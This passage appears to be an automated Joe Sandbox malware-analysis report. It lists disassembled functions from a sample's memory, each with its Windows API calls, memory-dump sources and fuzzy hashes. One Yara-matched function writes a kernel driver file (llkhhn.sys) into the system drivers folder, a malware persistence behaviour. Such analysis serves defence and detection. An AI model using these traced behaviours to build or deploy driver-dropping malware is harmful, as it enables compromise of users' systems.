                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Global$Size$Wire
                                    • String ID: pTL
                                    • API String ID: 2995285337-168633513
                                    • Opcode ID: 22eebc5018f24debd7ca3b29e15b59b1a59cb8afe7a053cf0ad092c14b619e13
                                    • Instruction ID: c92a2f5885850dfa5d8d6d90506b118fc0898fe83421306ecbee74a1ed6716fd
                                    • Opcode Fuzzy Hash: 22eebc5018f24debd7ca3b29e15b59b1a59cb8afe7a053cf0ad092c14b619e13
                                    • Instruction Fuzzy Hash: 95217176900258ABC710DF99D841BDEFBB8FF48724F10416EE819E3381DB39994187A9
                                    Function 004A9D1B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 004A9D59
                                    • GetSystemMetrics.USER32(00000000), ref: 004A9D71
                                    • GetSystemMetrics.USER32(00000001), ref: 004A9D78
                                    • lstrcpy.KERNEL32(-00000028,DISPLAY), ref: 004A9D9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: System$Metrics$InfoParameterslstrcpy
                                    • String ID: DISPLAY
                                    • API String ID: 1409579217-865373369
                                    • Opcode ID: 387b92391de3dc685236088184caee84a8a7f6c5abca0d6ad35b6e4a76228012
                                    • Instruction ID: 2c820198e7b0b4952600ce56562e831a141e67a3797b7b92ea921da4d1b4f44d
                                    • Opcode Fuzzy Hash: 387b92391de3dc685236088184caee84a8a7f6c5abca0d6ad35b6e4a76228012
                                    • Instruction Fuzzy Hash: 4111A371A00224EBCF519F659C84A9BBFA8FF6B751B408063FD059F141D276DD90CBA8
                                    Function 0042FBF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Shell_NotifyIcon.SHELL32(00000001), ref: 0042FC69
                                    • DestroyCursor.USER32(?), ref: 0042FC76
                                    • Shell_NotifyIcon.SHELL32 ref: 0042FCA9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_$CursorDestroy
                                    • String ID: X$d
                                    • API String ID: 3039372612-651813629
                                    • Opcode ID: c43f9a32d563e2d643b86ac779afd449920991f6190f9f3d948b00cd87127dda
                                    • Instruction ID: 995f56bac9d7122c2ff570847b1d0a9a1a1c82c39026e2b5a3491e4288b853fe
                                    • Opcode Fuzzy Hash: c43f9a32d563e2d643b86ac779afd449920991f6190f9f3d948b00cd87127dda
                                    • Instruction Fuzzy Hash: 0A215875608700AFE350DF15D804B9BFBE4BFC4744F40892EB9C992250D7B5A908CB96
                                    Function 004C2E13 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowExtEx.GDI32(?,?,?,?,?,?,00423CE3,?,?,?,?,?), ref: 004C2E24
                                    • GetViewportExtEx.GDI32(?,<B,?,?,?,?,00423CE3,?,?,?,?,?), ref: 004C2E31
                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 004C2E56
                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 004C2E71
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ViewportWindow
                                    • String ID: <B
                                    • API String ID: 1589084482-252759519
                                    • Opcode ID: 433cb428fd57c37b4194cd17935a97e49f567100ce7a6f64942ed7179fcc455b
                                    • Instruction ID: f86ab26ab232c59959d8ca4736dc5a80bbd03f3a4a7919369c6ba843da2120c6
                                    • Opcode Fuzzy Hash: 433cb428fd57c37b4194cd17935a97e49f567100ce7a6f64942ed7179fcc455b
                                    • Instruction Fuzzy Hash: 8DF01972800118FFEB116B66DD0ACBEBBBDEF50714B10443EF85192170EB756E519B54
                                    Function 004C6CEC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(00614470), ref: 004C6D27
                                    • RtlInitializeCriticalSection.NTDLL(00000000), ref: 004C6D39
                                    • RtlLeaveCriticalSection.NTDLL(00614470), ref: 004C6D42
                                    • RtlEnterCriticalSection.NTDLL(00000000), ref: 004C6D54
                                      • Part of subcall function 004C6C59: GetVersion.KERNEL32(?,004C6CFC,005BDEE8,004C60AC,00000010,00000000,00000100,005BDEE8,?,?,004C5A93,004C5AF6,004C5377,004C1DA3,00000100,004C1D3C), ref: 004C6C6C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CriticalSection$Enter$InitializeLeaveVersion
                                    • String ID: pDa
                                    • API String ID: 1193629340-84961933
                                    • Opcode ID: bf21fe5c3781d74f23af11bb6e01763e3a9bc5685fbb296f09bb645fb25c83d8
                                    • Instruction ID: 47d9eabf0e23aed8511586495752e972e6fb053112f34469d553eaced3a9506a
                                    • Opcode Fuzzy Hash: bf21fe5c3781d74f23af11bb6e01763e3a9bc5685fbb296f09bb645fb25c83d8
                                    • Instruction Fuzzy Hash: D7F0A47950120ADFC7509F64FC84E96B3AEFB10316B05943FE64283010DF34E455CAA8
                                    Function 02424595 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileA.KERNEL32(C:\Windows\system32\drivers\llkhhn.sys), ref: 024245A7
                                    • CreateFileA.KERNEL32(C:\Windows\system32\drivers\llkhhn.sys,40000000,00000002,00000000,00000002,00000020,00000000), ref: 024245C1
                                    • WriteFile.KERNEL32(000000FF,024A25F4,00001425,00000000,00000000), ref: 024245E6
                                    • CloseHandle.KERNEL32(000000FF), ref: 024245F0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateDeleteHandleWrite
                                    • String ID: C:\Windows\system32\drivers\llkhhn.sys
                                    • API String ID: 656945655-4146516600
                                    • Opcode ID: aa87bb4b42af5fc19f8eb936811c32e63b2573e31ef5e7eb3f4740b92266f996
                                    • Instruction ID: 1dd7f153bb43c2dbd89c8d2cba8c7acc74d0d594c961e8c7ac21b62f16e6f80a
                                    • Opcode Fuzzy Hash: aa87bb4b42af5fc19f8eb936811c32e63b2573e31ef5e7eb3f4740b92266f996
                                    • Instruction Fuzzy Hash: 48F03074E84304FBEB14DBA4AC0BF9D7B78A709B02F604544F605661C0C6B06A158B55
                                    Function 004ACABC Relevance: 7.8, APIs: 5, Instructions: 278COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b64a7d96c7d34903baf00a61548577d394c10b456d9d484e5ffd35c7e0195b81
                                    • Instruction ID: dedd41a1162da2ce340f0e5efe49afcce57ce0bebb6ac887a9cc3b11334addb2
                                    • Opcode Fuzzy Hash: b64a7d96c7d34903baf00a61548577d394c10b456d9d484e5ffd35c7e0195b81
                                    • Instruction Fuzzy Hash: AB9103B1C01114AECB61AB69DCC19DF7EB9EB66760F24012BF815B6291D7398D40CB78
                                    Function 00444870 Relevance: 7.7, APIs: 5, Instructions: 229COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Client$Copy
                                    • String ID:
                                    • API String ID: 472922470-0
                                    • Opcode ID: a5c544a32fb15cfc0d8de0728231038fd4ca4c6afd37b14830ccdc3f0be28745
                                    • Instruction ID: ef74e3605ca3db69dea5e97d44e1d4b6d807f611f392b29103a22232329aac27
                                    • Opcode Fuzzy Hash: a5c544a32fb15cfc0d8de0728231038fd4ca4c6afd37b14830ccdc3f0be28745
                                    • Instruction Fuzzy Hash: 618180712083419FE324DF69C891B6FB3E5FBC4708F104A1EF18683251EB78A909CB66
                                    Function 00411A00 Relevance: 7.7, APIs: 5, Instructions: 158comregistryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadTypeLib.OLEAUT32(00000000), ref: 00411A5F
                                      • Part of subcall function 00434C60: lstrlen.KERNEL32(00000000,00000000,0042B593,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00434C6E
                                    • GetUserDefaultLCID.KERNEL32(00000000,?,?,00000001), ref: 00411A9B
                                    • LHashValOfNameSys.OLEAUT32(00000001,00000000), ref: 00411AA4
                                    • RegisterTypeLib.OLEAUT32(?,00000000), ref: 00411B09
                                    • OleRun.OLE32(00000000), ref: 00411B90
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Type$DefaultHashLoadNameRegisterUserlstrlen
                                    • String ID:
                                    • API String ID: 2906146520-0
                                    • Opcode ID: 812ef1fd6fe4ca896912f2dbaac651ab79ca29cc1c0be8450c632e49f03a681c
                                    • Instruction ID: c093d5041f296ad973416e39a9e3f4f9f1599ea0ba081e15ca8fb7b7e75e182d
                                    • Opcode Fuzzy Hash: 812ef1fd6fe4ca896912f2dbaac651ab79ca29cc1c0be8450c632e49f03a681c
                                    • Instruction Fuzzy Hash: 17514B71608346AFD700DF51CC85EABB7E8EF85748F04482DFA4587260E778E949CBA6
                                    Function 004145C0 Relevance: 7.6, APIs: 5, Instructions: 134windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTextExtentPoint32A.GDI32(?,005BDCBC,?,?), ref: 00414661
                                    • GetSystemMetrics.USER32(0000002E), ref: 00414675
                                    • GetWindowRect.USER32(?,?), ref: 00414695
                                    • GetStockObject.GDI32(00000011), ref: 004146E2
                                    • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 004146F1
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ExtentMessageMetricsObjectPoint32RectSendStockSystemTextWindow
                                    • String ID:
                                    • API String ID: 3316701254-0
                                    • Opcode ID: df411d57c9a1118f04fb07ac2d42fba8855791ab813d62488509ac051c370834
                                    • Instruction ID: 44ba29ab3fc2ae6ef20f4d24810152a0a04bbd30e91f21250fffc357d2707fa4
                                    • Opcode Fuzzy Hash: df411d57c9a1118f04fb07ac2d42fba8855791ab813d62488509ac051c370834
                                    • Instruction Fuzzy Hash: 09418175244340AFD364DF65C981FAB77A8ABC5B58F00492EF642972C0DBA8ED01CB59
                                    Function 004308F0 Relevance: 7.6, APIs: 5, Instructions: 104windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(?), ref: 004309C0
                                    • WinHelpA.USER32(?,00000000,00000002,00000000), ref: 004309DB
                                    • GetMenu.USER32(?), ref: 004309EB
                                    • SetMenu.USER32(?,00000000), ref: 004309F8
                                    • DestroyMenu.USER32(00000000), ref: 00430A03
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
